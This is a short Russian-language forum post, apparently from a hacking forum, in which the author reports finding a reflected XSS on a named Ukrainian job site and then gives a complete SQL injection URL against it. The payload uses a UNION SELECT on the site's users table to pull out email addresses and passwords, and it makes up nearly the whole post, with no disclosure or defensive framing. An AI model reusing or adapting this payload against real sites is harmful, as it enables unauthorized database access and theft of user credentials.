Нашел сначала пассивную xss, но мне показалось что ресурс содержит еще баги, начал ковырять, в итоге :
Код:
http://www.ukrindustrial.com/job/?fuseaction=job_employer.viewVacancy&jvr_id=-11029+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,email,pass),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+limit+2,10--